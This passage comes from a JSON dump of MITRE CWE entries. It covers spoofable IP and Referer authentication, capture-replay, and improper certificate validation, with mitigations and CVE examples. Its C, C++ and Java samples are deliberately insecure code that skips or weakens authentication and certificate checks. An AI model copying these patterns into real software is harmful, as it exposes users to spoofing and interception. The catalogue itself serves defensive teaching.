trusted address before responding to the request.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"sd = socket(AF_INET, SOCK_DGRAM, 0);serv.sin_family = AF_INET;serv.sin_addr.s_addr = htonl(INADDR_ANY);servr.sin_port = htons(1008);bind(sd, (struct sockaddr *) &amp; serv, sizeof(serv));while (1) {}","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"memset(msg, 0x0, MAX_MSG);clilen = sizeof(cli);if (inet_ntoa(cli.sin_addr)==getTrustedAddress()) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"n = recvfrom(sd, msg, MAX_MSG, 0, (struct sockaddr *) &amp; cli, &amp;clilen);","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"while(true) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"DatagramPacket rp=new DatagramPacket(rData,rData.length);outSock.receive(rp);String in = new String(p.getData(),0, rp.getLength());InetAddress clientIPAddress = rp.getAddress();int port = rp.getPort();if (isTrustedAddress(clientIPAddress) &amp; secretKey.equals(in)) {}","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"out = secret.getBytes();DatagramPacket sp =new DatagramPacket(out,out.length, IPAddress, port); outSock.send(sp);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}}],"Body_Text":"The code only verifies the address as stored in the request packet. An attacker can spoof this address, thus impersonating a trusted client."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Trusting self-reported IP address"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"4"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-06-23","Modification_Importance":"Critical","Modification_Comment":"Changed type from composite to weakness."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Description, Name, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Trusting Self-reported IP Address","attr":{"@_Date":"2013-07-17"}}}},"292":{"attr":{"@_ID":"292","@_Name":"DEPRECATED: Trusting Self-reported DNS Name","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because it was a duplicate of CWE-350. All content has been transferred to CWE-350.","Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-06-23","Modification_Importance":"Critical","Modification_Comment":"CWE-247 and CWE-292 deprecated and merged into CWE-350 to address duplicates."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Likelihood_of_Exploit, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Name"}],"Previous_Entry_Name":[{"#text":"Trusting Self-reported DNS Name","attr":{"@_Date":"2013-07-17"}},{"#text":"DEPRECATED (Duplicate): Trusting Self-reported DNS Name","attr":{"@_Date":"2021-07-20"}}]}},"293":{"attr":{"@_ID":"293","@_Name":"Using Referer Field for Authentication","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The referer field in HTTP requests can be easily modified and, as such, is not a valid means of message integrity checking.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"290","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"The referer field in HTML requests can be simply modified by malicious users, rendering it useless as a means of checking the validity of the request in question."},"Alternate_Terms":{"Alternate_Term":{"Term":"referrer","Description":"While the proper spelling might be regarded as \\"referrer,\\" the HTTP RFCs and their implementations use \\"referer,\\" so this is regarded as the correct spelling."}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Actions, which may not be authorized otherwise, can be carried out as if they were validated by the server referred to."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"In order to usefully check if a given action is authorized, some means of strong authentication and method protection must be used. Use other means of authorization that cannot be simply spoofed. Possibilities include a username/password or certificate."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code samples check a packet\'s referer in order to decide whether or not an inbound request is from a trusted host.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"String trustedReferer = \\"http://www.example.com/\\"while(true){}","xhtml:br":"","xhtml:div":{"#text":"n = read(newsock, buffer, BUFSIZE);requestPacket = processPacket(buffer, n);if (requestPacket.referer == trustedReferer){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"openNewSecureSession(requestPacket);","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"boolean processConnectionRequest(HttpServletRequest request){}","xhtml:div":{"#text":"String referer = request.getHeader(\\"referer\\")String trustedReferer = \\"http://www.example.com/\\"if(referer.equals(trustedReferer)){}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":[{"#text":"openPrivilegedConnection(request);return true;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"sendPrivilegeError(request);return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}],"Body_Text":"These examples check if a request is from a trusted referer before responding to a request, but the code only verifies the referer name as stored in the request packet. An attacker can spoof the referer, thus impersonating a trusted client."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Using referrer field for authentication"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP29","Entry_Name":"Faulty endpoint authentication"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 17, &#34;Referer Request Header&#34;, Page 1030"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Background_Details, Common_Consequences, Relationships, Relevant_Properties, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"}]}},"294":{"attr":{"@_ID":"294","@_Name":"Authentication Bypass by Capture-replay","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A capture-replay flaw exists when the design of the software makes it possible for a malicious user to sniff network traffic and bypass authentication by replaying it to the server in question to the same effect as the original message (or with minor changes).","Extended_Description":"Capture-replay attacks are common and can be difficult to defeat without cryptography. They are a subset of network injection attacks that rely on observing previously-sent valid commands, then changing them slightly if necessary and resending the same commands to the server.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Messages sent with a capture-relay attack allow access to resources which are not otherwise accessible without proper authentication."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Utilize some sequence or time stamping functionality along with a checksum which takes this into account in order to ensure that messages can be parsed only once."},{"Phase":"Architecture and Design","Description":"Since any attacker who can listen to traffic can see sequence numbers, it is necessary to sign messages with some kind of cryptography to ensure that sequence numbers are not simply doctored along with content."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-3435","Description":"product authentication succeeds if user-provided MD5 hash matches the hash in its database; this can be subjected to replay attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3435"},{"Reference":"CVE-2007-4961","Description":"Chain: cleartext transmission of the MD5 hash of password (CWE-319) enables attacks against a server that is susceptible to replay (CWE-294).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4961"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Authentication bypass by replay"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Capture-replay"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"102"}},{"attr":{"@_CAPEC_ID":"509"}},{"attr":{"@_CAPEC_ID":"555"}},{"attr":{"@_CAPEC_ID":"561"}},{"attr":{"@_CAPEC_ID":"60"}},{"attr":{"@_CAPEC_ID":"644"}},{"attr":{"@_CAPEC_ID":"645"}},{"attr":{"@_CAPEC_ID":"652"}},{"attr":{"@_CAPEC_ID":"94"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"295":{"attr":{"@_ID":"295","@_Name":"Improper Certificate Validation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not validate, or incorrectly validates, a certificate.","Extended_Description":"When a certificate is invalid or malicious, it might allow an attacker to spoof a trusted entity by interfering in the communication path between the host and client. The software might connect to a malicious host while believing it is a trusted host, or the software might be deceived into accepting spoofed data that appears to originate from a trusted host.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"322","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"A certificate is a token that associates an identity (principal) to a cryptographic key. Certificates can be used to check if a public key belongs to the assumed owner."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Implementation","Note":"When the software uses certificate pinning, the developer might not properly validate all relevant components of the certificate before pinning the certificate. This can make it difficult or expensive to test after the pinning is complete."}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Authentication"],"Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"]}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Web Application Scanner"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Man-in-the-middle attack tool"}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Description":"Certificates should be carefully managed and checked to assure that data are encrypted with the intended owner\'s public key."},{"Phase":"Implementation","Description":"If certificate pinning is being used, ensure that all relevant properties of the certificate are fully validated before the certificate is pinned, including the hostname."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-121"},"Intro_Text":"This code checks the certificate of a connected peer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if ((cert = SSL_get_peer_certificate(ssl)) &amp;&amp; host)if ((X509_V_OK==foo) || X509_V_ERR_SELF_SIGNED_CERT_IN_CHAIN==foo))","xhtml:div":[{"#text":"foo=SSL_get_verify_result(ssl);","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// certificate looks good, host can be trusted"}}],"xhtml:br":""}},"Body_Text":"In this case, because the certificate is self-signed, there was no external authority that could prove the identity of the host. The program could be communicating with a different system that is spoofing the host, e.g. by poisoning the DNS cache or using an Adversary-in-the-Middle (AITM) attack to modify the traffic from server to client."},{"attr":{"@_Demonstrative_Example_ID":"DX-122"},"Intro_Text":"The following OpenSSL code obtains a certificate and verifies it.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"cert = SSL_get_peer_certificate(ssl);if (cert &amp;&amp; (SSL_get_verify_result(ssl)==X509_V_OK)) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// do secret things"}}}},"Body_Text":"Even though the \\"verify\\" step returns X509_V_OK, this step does not include checking the Common Name against the name of the host. That is, there is no guarantee that the certificate is for the desired host. The SSL connection could have been established with a malicious host that provided a valid certificate."},{"attr":{"@_Demonstrative_Example_ID":"DX-123"},"Intro_Text":"The following OpenSSL code ensures that there is a certificate and allows the use of expired certificates.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (cert = SSL_get_peer(certificate(ssl)) {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"foo=SSL_get_verify_result(ssl);if ((X509_V_OK==foo) || (X509_V_ERR_CERT_HAS_EXPIRED==foo))","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"//do stuff"}}}}}},"Body_Text":"If the call to SSL_get_verify_result() returns X509_V_ERR_CERT_HAS_EXPIRED, this means that the certificate has expired. As time goes on, there is an increasing chance for attackers to compromise the certificate."},{"attr":{"@_Demonstrative_Example_ID":"DX-124"},"Intro_Text":"The following OpenSSL code ensures that there is a certificate before continuing execution.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (cert = SSL_get_peer_certificate(ssl)) {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// got a certificate, do secret things"}}}},"Body_Text":"Because this code does not use SSL_get_verify_results() to check the certificate, it could accept certificates that have been revoked (X509_V_ERR_CERT_REVOKED). The software could be communicating with a malicious host."},{"attr":{"@_Demonstrative_Example_ID":"DX-125"},"Intro_Text":"The following OpenSSL code ensures that the host has a certificate.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (cert = SSL_get_peer_certificate(ssl)) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["","","","","",""],"xhtml:i":["// got certificate, host can be trusted","//foo=SSL_get_verify_result(ssl);","//if (X509_V_OK==foo) ..."]}}}},"Body_Text":"Note that the code does not call SSL_get_verify_result(ssl), which effectively disables the validation step that checks the certificate."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-1266","Description":"chain: incorrect \\"goto\\" in Apple SSL product bypasses certificate validation, allowing Adversary-in-the-Middle (AITM) attack (Apple \\"goto fail\\" bug). CWE-705 (Incorrect Control Flow Scoping) -&gt; CWE-561 (Dead Code) -&gt; CWE-295 (Improper Certificate Validation) -&gt; CWE-393 (Return of Wrong Status Code) -&gt; CWE-300 (Channel Accessible by Non-Endpoint).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1266"},{"Reference":"CVE-2021-22909","Description":"Chain: router\'s firmware update procedure uses curl with \\"-k\\" (insecure) option that disables certificate validation (CWE-295), allowing adversary-in-the-middle (AITM) compromise with a malicious firmware image (CWE-494).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22909"},{"Reference":"CVE-2008-4989","Description":"Verification function trusts certificate chains in which the last certificate is self-signed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4989"},{"Reference":"CVE-2012-5821","Description":"Web browser uses a TLS-related function incorrectly, preventing it from verifying that a server\'s certificate is signed by a trusted certification authority (CA)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5821"},{"Reference":"CVE-2009-3046","Description":"Web browser does not check if any intermediate certificates are revoked.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3046"},{"Reference":"CVE-2011-0199","Description":"Operating system does not check Certificate Revocation List (CRL) in some cases, allowing spoofing using a revoked certificate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0199"},{"Reference":"CVE-2012-5810","Description":"Mobile banking application does not verify hostname, leading to financial loss.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5810"},{"Reference":"CVE-2012-3446","Description":"Cloud-support library written in Python uses incorrect regular expression when matching hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3446"},{"Reference":"CVE-2009-2408","Description":"Web browser does not correctly handle \'\\\\0\' character (NUL) in Common Name, allowing spoofing of https sites.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2408"},{"Reference":"CVE-2012-2993","Description":"Smartphone device does not verify hostname, allowing spoofing of mail services.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2993"},{"Reference":"CVE-2012-5822","Description":"Application uses third-party library that does not validate hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5822"},{"Reference":"CVE-2012-5819","Description":"Cloud storage management application does not validate hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5819"},{"Reference":"CVE-2012-5817","Description":"Java library uses JSSE SSLSocket and SSLEngine classes, which do not verify the hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5817"},{"Reference":"CVE-2010-1378","Description":"chain: incorrect calculation allows attackers to bypass certificate checks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1378"},{"Reference":"CVE-2005-3170","Description":"LDAP client accepts certificates even if they are not from a trusted CA.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3170"},{"Reference":"CVE-2009-0265","Description":"chain: DNS server does not correctly check return value from the OpenSSL EVP_VerifyFinal function allows bypass of validation of the certificate chain.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0265"},{"Reference":"CVE-2003-1229","Description":"chain: product checks if client is trusted when it intended to check if the server is trusted, allowing validation of signed code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1229"},{"Reference":"CVE-2002-0862","Description":"Cryptographic API, as used in web browsers, mail clients, and other software, does not properly validate Basic Constraints.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0862"},{"Reference":"CVE-2009-1358","Description":"chain: OS package manager does not check properly check the return value, allowing bypass using a revoked certificate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1358"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A10","Entry_Name":"Insecure Configuration Management","Mapping_Fit":"CWE More Specific"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"459"}},{"attr":{"@_CAPEC_ID":"475"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-243"}},{"attr":{"@_External_Reference_ID":"REF-244"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Background_Details, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-12-28","Modification_Importance":"Critical","Modification_Comment":"Converted from category to weakness class."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Name, Observed_Examples, Potential_Mitigations, References, Relationships, Time_of_Introduction, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content 